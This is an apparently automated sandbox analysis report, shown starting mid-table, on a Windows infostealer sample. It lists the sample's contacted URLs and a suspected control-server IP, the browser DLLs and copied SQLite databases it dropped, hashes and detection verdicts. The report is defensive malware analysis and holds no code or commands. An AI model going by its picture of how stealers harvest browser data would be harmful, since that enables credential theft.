                  C:\ProgramData\KECBFBAEBKJJ\softokn3.dll | 0% | ReversingLabs | |
                  C:\ProgramData\KECBFBAEBKJJ\vcruntime140.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqls[1].dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll | 0% | ReversingLabs | |
                  No Antivirus matches
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  steamcommunity.com | 104.102.42.29 | true | true | | unknown
                    unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgRegAsm.exe, 00000001.00000002.2526755030.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, DHDHCG.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://steamcommunity.com/discussions/RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://store.steampowered.com/stats/RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&ampRegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://store.steampowered.com/steam_refunds/RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchIJECAE.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://steamcommunity.com/workshop/RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://65.109.242.59GIDARegAsm.exe, 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://steamcommunity.com/profiles/76561199689717899/badgesRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://store.steampowered.com/legal/RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    http://www.sqlite.org/copyright.html.RegAsm.exe, 00000001.00000002.2534193240.000000001925D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://65.109.242.5976561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=englRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://steamcommunity.com/profiles/76561199689717899/inventory/RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=enRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoIJECAE.1.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.RegAsm.exe, 00000001.00000002.2526755030.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, DHDHCG.1.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&amRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOITRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engliRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://store.steampowered.com/76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_RegAsm.exe, 00000001.00000002.2526755030.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, DHDHCG.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&ampRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://ac.ecosia.org/autocomplete?q=IJECAE.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgRegAsm.exe, 00000001.00000002.2526755030.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, DHDHCG.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engliRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3RegAsm.exe, 00000001.00000002.2526755030.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, DHDHCG.1.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://store.steampowered.com/account/cookiepreferences/RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://store.steampowered.com/mobileRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://support.mozilla.orgHCAEBF.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://steamcommunity.com/76561199689717899[1].htm.1.drtrue
                    • Avira URL Cloud: safe
                    unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=IJECAE.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://steamcommunity.com/login/hoRegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IP | Domain | Country | ASN | ASN Name | Malicious
                    104.102.42.29 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | true
                    65.109.242.59 | unknown | United States | 11022 | ALABANZA-BALTUS | false
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1447265
                    Start date and time:2024-05-24 17:46:04 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 24s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:12
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@8/27@1/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 94
                    • Number of non-executed functions: 236
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: file.exe
                    Time | Type | Description
                    11:47:03 | API Interceptor | 1x Sleep call for process: RegAsm.exe modified
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):159744
                                                                                  Entropy (8bit):0.5394293526345721
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):10237
                                                                                  Entropy (8bit):5.498288591230544
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
                                                                                  MD5:0F58C61DE9618A1B53735181E43EE166
                                                                                  SHA1:CC45931CF12AF92935A84C2A015786CC810AEC3A
                                                                                  SHA-256:AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
                                                                                  SHA-512:DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):98304
                                                                                  Entropy (8bit):0.08235737944063153
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):0.017262956703125623
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):155648
                                                                                  Entropy (8bit):0.5407252242845243
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):5242880
                                                                                  Entropy (8bit):0.0357803477377646
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                  MD5:76D181A334D47872CD2E37135CC83F95
                                                                                  SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                  SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                  SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):0.017262956703125623
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):685392
                                                                                  Entropy (8bit):6.872871740790978
                                                                                  Encrypted:false
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe, Detection: malicious
                                                                                  • Filename: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, Detection: malicious
                                                                                  • Filename: BI6oo9z4In.exe, Detection: malicious
                                                                                  • Filename: file.exe, Detection: malicious
                                                                                  • Filename: btCbrSS2Je.exe, Detection: malicious
                                                                                  • Filename: 7urUz64I0Y.exe, Detection: malicious
                                                                                  • Filename: file.exe, Detection: malicious
                                                                                  • Filename: SecuriteInfo.com.Trojan.PWS.Steam.37259.28451.11337.exe, Detection: malicious
                                                                                  • Filename: a6lzHWp4pa.exe, Detection: malicious
                                                                                  • Filename: file.exe, Detection: malicious
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):608080
                                                                                  Entropy (8bit):6.833616094889818
                                                                                  Encrypted:false
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe, Detection: malicious
                                                                                  • Filename: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, Detection: malicious
                                                                                  • Filename: BI6oo9z4In.exe, Detection: malicious
                                                                                  • Filename: file.exe, Detection: malicious
                                                                                  • Filename: btCbrSS2Je.exe, Detection: malicious
